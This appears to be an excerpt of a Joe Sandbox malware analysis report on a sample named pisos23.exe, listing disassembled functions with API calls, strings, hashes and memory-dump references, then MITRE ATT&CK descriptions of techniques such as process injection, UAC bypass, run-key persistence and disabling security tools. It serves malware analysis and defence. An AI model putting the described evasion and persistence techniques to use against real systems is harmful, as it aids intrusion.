Opcode ID: 2f32af37aa4a163de1baf1c66bdb9525054255a17caeb52204f34ef9d763e4f0
Instruction ID: c0bcba18f0d42a87ef5588e7387226e5d6ba4f50834e23c15b2b6df71843c093
Opcode Fuzzy Hash: 2f32af37aa4a163de1baf1c66bdb9525054255a17caeb52204f34ef9d763e4f0
Instruction Fuzzy Hash: 8501843656D2126EA6252BB8BC865EF27E4EF01BB47B003BAF520570F1EF118C96D154

Function 00B1CDF4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe, xrefs: 00B1CE10

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe
API String ID: 0-1476020350
Opcode ID: 793daa97ccaade6bcbf7ec6c4ffbebb00037fc4a3a4272959d43f706c0de8ca7
Instruction ID: 4a8c6ae302f0679182f1318ab188b7ae46a79a8ad7f8e7339222536733631e8e
Opcode Fuzzy Hash: 793daa97ccaade6bcbf7ec6c4ffbebb00037fc4a3a4272959d43f706c0de8ca7
Instruction Fuzzy Hash: 8B219D72A40205AFDB20AF65D881AFB7FE9EF4036479045A6F91987141DB30FCD087A0

Function 00B1551E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C5FEAF00,?,?,00000000,00B269EB,000000FF,?,00B155DF,00B154C6,?,00B1567B,00000000), ref: 00B15553
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B15565
FreeLibrary.KERNEL32(00000000,?,?,00000000,00B269EB,000000FF,?,00B155DF,00B154C6,?,00B1567B,00000000), ref: 00B15587

Strings

CorExitProcess, xrefs: 00B1555D
mscoree.dll, xrefs: 00B1554C

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 45a26cf56768dd6f6ed0651d2457db9ee45d44c67712027433b1bce7c5dee4c7
Instruction ID: 68ed7dcd6f12f4a03e725e6e2175343f56069ae504d6b712ff9c2e83e2c9ea80
Opcode Fuzzy Hash: 45a26cf56768dd6f6ed0651d2457db9ee45d44c67712027433b1bce7c5dee4c7
Instruction Fuzzy Hash: 15016231900629EFDB218F60DC05FBEBBF9FB48B14F404575F815A22A0DB749941CA90

Function 00B106E2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 38COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B106E9

Strings

future already retrieved, xrefs: 00B10731
broken promise, xrefs: 00B10738
promise already satisfied, xrefs: 00B1072A
no state, xrefs: 00B10723

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: H_prolog3
String ID: broken promise$future already retrieved$no state$promise already satisfied
API String ID: 431132790-3399861469
Opcode ID: 694bb633e57930bbe10d44f7a42d9273fa190c3f07b05f9b5b8130f1ade35bfb
Instruction ID: 0a657ef3221b05457d7d61e4db05f6f831dff74fb73691d9ba39794fd79c0b62
Opcode Fuzzy Hash: 694bb633e57930bbe10d44f7a42d9273fa190c3f07b05f9b5b8130f1ade35bfb
Instruction Fuzzy Hash: E4F0A0736A010957DA08AAFCB5096AC3BCCD741314F4441D1F10CCAE80D6A2EFC0D494

Function 00B18604 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B1850A,?,?,00000000,00000000,00000000,?), ref: 00B18629
CatchIt.LIBVCRUNTIME ref: 00B1870F

Strings

RCC, xrefs: 00B18643
MOC, xrefs: 00B1863B

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 4d88ffbca7b5b069cdde9070fdbba37798e9eead2258f9ea85e8b0744dc1823b
Instruction ID: f720b423153f08a5cb1dd7a3dd015531f19fa4e85380380d91d0d2dc375cd014
Opcode Fuzzy Hash: 4d88ffbca7b5b069cdde9070fdbba37798e9eead2258f9ea85e8b0744dc1823b
Instruction Fuzzy Hash: 6D411771900209EFCF16DF94CD81AEEBBF5FF48304F644099F90467261DA359990DB51

Function 00B1F750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000008,00000000,00000800,?,00B1F7EC,?,DF7D7950,?,?,?,?,00B1F634,00000000,FlsAlloc,00B2949C,00B294A4), ref: 00B1F75D
GetLastError.KERNEL32(?,00B1F7EC,?,DF7D7950,?,?,?,?,00B1F634,00000000,FlsAlloc,00B2949C,00B294A4,?,?,00B17951), ref: 00B1F767
LoadLibraryExW.KERNEL32(00000008,00000000,00000000,00B2FE68,00000008,00A64E14), ref: 00B1F78F

Strings

api-ms-, xrefs: 00B1F774

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: c2fe5a61ff134de83b062ecf9e48d99c92f013bf4fece23193f0d3489a950a15
Instruction ID: 328f301ca2999e9d9a39f92d223ed26baf6cc304abea3e04f8e5b50cbeccf422
Opcode Fuzzy Hash: c2fe5a61ff134de83b062ecf9e48d99c92f013bf4fece23193f0d3489a950a15
Instruction Fuzzy Hash: 13E01230640206B6EB211F61EC46FB93EA5EB00B54F544470F90DA50E5DB619D52D945

Function 00B2010F Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(C5FEAF00,00000000,00000000,?), ref: 00B20172

Part of subcall function 00B1D4AF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B1FBB8,?,00000000,-00000008), ref: 00B1D510

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B203C4
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B2040A
GetLastError.KERNEL32 ref: 00B204AD

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: d790305b8b736814496cbfc1815676537a799129ce76501031f6f22f920dd024
Instruction ID: ba8a6a718adfec9be9f1e41a7c189cb46877651ef8840866f5e7d6a489f0cf29
Opcode Fuzzy Hash: d790305b8b736814496cbfc1815676537a799129ce76501031f6f22f920dd024
Instruction Fuzzy Hash: BFD17C75D14258DFCB15DFA8E880AEDBBF4FF09310F2481AAE569EB352D630A941CB50

Function 00B18008 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B180CF
___AdjustPointer.LIBCMT ref: 00B180F2
___AdjustPointer.LIBCMT ref: 00B1818E

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ab7bcf9fcf570e45fb72be5be71d8e54d17def1f45c36e6f8578b919964b41aa
Instruction ID: a998d992ae58e6d7b671e2865ef2341153a676485b4ed330dce5959f55de65b5
Opcode Fuzzy Hash: ab7bcf9fcf570e45fb72be5be71d8e54d17def1f45c36e6f8578b919964b41aa
Instruction Fuzzy Hash: F851D272601206EFDB299F11D881BEA77E5FF08300F9041ADE90567291EB31EDE1CB90

Function 00B1C855 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00B1D4AF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B1FBB8,?,00000000,-00000008), ref: 00B1D510

GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00B1CBFB,?,?,?,00000000), ref: 00B1C8B9
__dosmaperr.LIBCMT ref: 00B1C8C0
GetLastError.KERNEL32(00000000,00B1CBFB,?,?,00000000,?,?,?,00000000,00000000,?,00B1CBFB,?,?,?,00000000), ref: 00B1C8FA
__dosmaperr.LIBCMT ref: 00B1C901

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: f63be16f543c97e8b26d187080a0295ba8dbcca5f84be29594c1fcc40f31a870
Instruction ID: 5b12a6700d792564b206878e42bb8f5a4e5545ca5989f2ed6f7d4f92012cbe5b
Opcode Fuzzy Hash: f63be16f543c97e8b26d187080a0295ba8dbcca5f84be29594c1fcc40f31a870
Instruction Fuzzy Hash: C821C571A40205AF9B21AF7688C18FFBBE9FF403B479045A9F91997151E730FD8087A0

Function 00B1D5AB Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B1D5B3

Part of subcall function 00B1D4AF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B1FBB8,?,00000000,-00000008), ref: 00B1D510

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B1D5EB
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B1D60B

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: f850396b73637612cd96327d044e729dcb451bfe1e55d0911f229a89937caf77
Instruction ID: 16cb15e7967d7a933bb3082fffb544d53429bb74e3eac5755ab470a18bc513ed
Opcode Fuzzy Hash: f850396b73637612cd96327d044e729dcb451bfe1e55d0911f229a89937caf77
Instruction Fuzzy Hash: 871108B65025057F66212B715ECDCFF69ECCE9539439000B4F50596101EE24AE8281B6

Function 00B10590 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00B104F3: GetModuleHandleExW.KERNEL32(00000002,00000000,00AD853E,?,?,00B104B6,00AD853E,?,00B10487,00AD853E), ref: 00B104FF

__Mtx_unlock.LIBCPMT ref: 00B105D6
FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,C5FEAF00,?,?,?,00B269EB,000000FF), ref: 00B105FE
__Mtx_unlock.LIBCPMT ref: 00B10639
__Cnd_broadcast.LIBCPMT ref: 00B1064A

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
String ID:
API String ID: 420990631-0
Opcode ID: 46440513ed66a966573052f601a1a1e08e2737984b0c6b932445fbcec47bd8b1
Instruction ID: ab8b748714703580b6613b5f5ed1a15bb2b475e05782de5e8211083da4a9c040
Opcode Fuzzy Hash: 46440513ed66a966573052f601a1a1e08e2737984b0c6b932445fbcec47bd8b1
Instruction Fuzzy Hash: 95110832954610ABCA217B65EC42B9E77F8FB52720F90809AF905E3351CFB4FCC18A55

Function 00B250EB Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00B2405E,00000000,00000001,?,?,?,00B20501,?,00000000,00000000), ref: 00B25102
GetLastError.KERNEL32(?,00B2405E,00000000,00000001,?,?,?,00B20501,?,00000000,00000000,?,?,?,00B1FE47,?), ref: 00B2510E

Part of subcall function 00B25160: CloseHandle.KERNEL32(FFFFFFFE,00B2511E,?,00B2405E,00000000,00000001,?,?,?,00B20501,?,00000000,00000000,?,?), ref: 00B25170

___initconout.LIBCMT ref: 00B2511E

Part of subcall function 00B25140: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B250DC,00B2404B,?,?,00B20501,?,00000000,00000000,?), ref: 00B25153

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00B2405E,00000000,00000001,?,?,?,00B20501,?,00000000,00000000,?), ref: 00B25133

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9db044483f0c2889c546f583d8a53e7f82e8a676b6e63813e037117fe5592af9
Instruction ID: fe4da46b3728871e8017d9f5a423e7e82e974a71f54a37d75a0c4ea22e13a992
Opcode Fuzzy Hash: 9db044483f0c2889c546f583d8a53e7f82e8a676b6e63813e037117fe5592af9
Instruction Fuzzy Hash: C3F01236400525BBCF322F91EC08F9A3F66EB08772F454060FA08A6120DA3189309B91

Function 00B17E78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00B17E81

Strings

csm, xrefs: 00B17EA3
csm, xrefs: 00B17F14

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 1bcc3a0fb37b6363a38f8ff105a2834c70e70dada8f561807425b7470ccc352b
Instruction ID: 697633e2f8a217b59be5d6f492e9a90f92d420b7ff6a15c82592411c17256b10
Opcode Fuzzy Hash: 1bcc3a0fb37b6363a38f8ff105a2834c70e70dada8f561807425b7470ccc352b
Instruction Fuzzy Hash: DF318136448154ABCF268F60D8449EB7BF6FB09715BA845D9F8584B121CB32CCE2DB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

